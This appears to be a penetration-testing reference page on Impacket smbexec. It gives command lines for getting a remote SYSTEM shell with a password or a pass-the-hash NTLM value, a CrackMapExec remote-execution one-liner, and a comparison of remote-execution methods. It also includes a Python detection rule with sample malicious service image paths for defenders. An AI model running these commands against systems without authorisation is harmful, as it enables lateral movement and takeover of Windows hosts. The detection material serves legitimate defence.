Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Impacket — smbexec

impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Returns SYSTEM shell. Uses service creation for execution.

How It Works

  1. Creates a service on target via SMB
  2. Service executes command, output redirected to file
  3. Reads output via SMB
  4. Deletes service
No binary upload — commands run through cmd.exe /Q /c.
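The four steps above leave a concrete trace on the target: a service whose image path is not a service binary but a cmd.exe /Q /c invocation with its output redirected into a file. The following detection logic is an added example (not part of this page or of Impacket) that scans service-installation events for exactly that pattern. Event IDs 7045 (System log, Service Control Manager) and 4697 (Security log, needs the "Audit Security System Extension" subcategory enabled) are real Windows event IDs; the record layout, the host, service names and image paths in SAMPLE_EVENTS are constructed for the example.

```python
import re

# Windows event IDs that record a new service being installed.
SERVICE_INSTALL_EVENTS = {7045, 4697}

# cmd.exe (or the %COMSPEC% expansion of it) started with /Q /c, the
# execution pattern the page describes for smbexec.
CMD_QC = re.compile(r'(?:\bcmd(?:\.exe)?|%COMSPEC%)\s+/Q\s+/c\b', re.IGNORECASE)

# Standard output redirected into a file ("output redirected to file").
# The caret form ^> appears when the redirection is itself quoted for cmd.
REDIRECT = re.compile(r'\^?>')

# Constructed sample records, simplified from the EventData of real events.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "WS01", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"event_id": 7045, "host": "WS01", "service_name": "svc_constructed_a",
     "image_path": r"cmd.exe /Q /c whoami > C:\Windows\Temp\out.txt 2>&1"},
    {"event_id": 7045, "host": "WS01", "service_name": "agent_wrapper",
     "image_path": r"cmd.exe /c C:\tools\agent.cmd"},   # benign: no /Q, no redirect
    {"event_id": 4697, "host": "SRV02", "service_name": "svc_constructed_b",
     "image_path": r"%COMSPEC% /Q /c ipconfig /all ^> C:\Windows\Temp\o.txt 2^>^&1"},
]


def is_smbexec_like(event):
    """True when a service-install event's image path is an ad-hoc cmd.exe
    command with redirected output rather than a real service binary."""
    if event.get("event_id") not in SERVICE_INSTALL_EVENTS:
        return False
    path = event.get("image_path", "")
    return bool(CMD_QC.search(path) and REDIRECT.search(path))


def find_suspicious(events):
    """Return (host, service_name, image_path) for every matching event."""
    return [(e["host"], e["service_name"], e["image_path"])
            for e in events if is_smbexec_like(e)]


if __name__ == "__main__":
    for host, name, path in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: service '{name}' installed with image path: {path}")
```

Because smbexec deletes the service after each command, the installation event is often the only durable artifact on the host; forwarding 7045/4697 to a central log store before the service is removed matters more than any single rule. Tightening the rule to the exact service name or output path a given tool version uses is possible, but the cmd.exe /Q /c plus redirection shape survives renaming.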

CrackMapExec

crackmapexec smb TARGET -u user -p password --exec-method smbexec -x "whoami"

Comparison

Feature         psexec    smbexec    wmiexec
Privilege       SYSTEM    SYSTEM     User
Binary upload   Yes       No         No
Protocol        SMB       SMB        WMI
Detection       High      Medium     Lower

Quick Reference

Task     Command
Shell    impacket-smbexec DOMAIN/user:pass@TARGET
PtH      impacket-smbexec DOMAIN/user@TARGET -hashes :HASH
CME      crackmapexec smb TARGET --exec-method smbexec -x "cmd"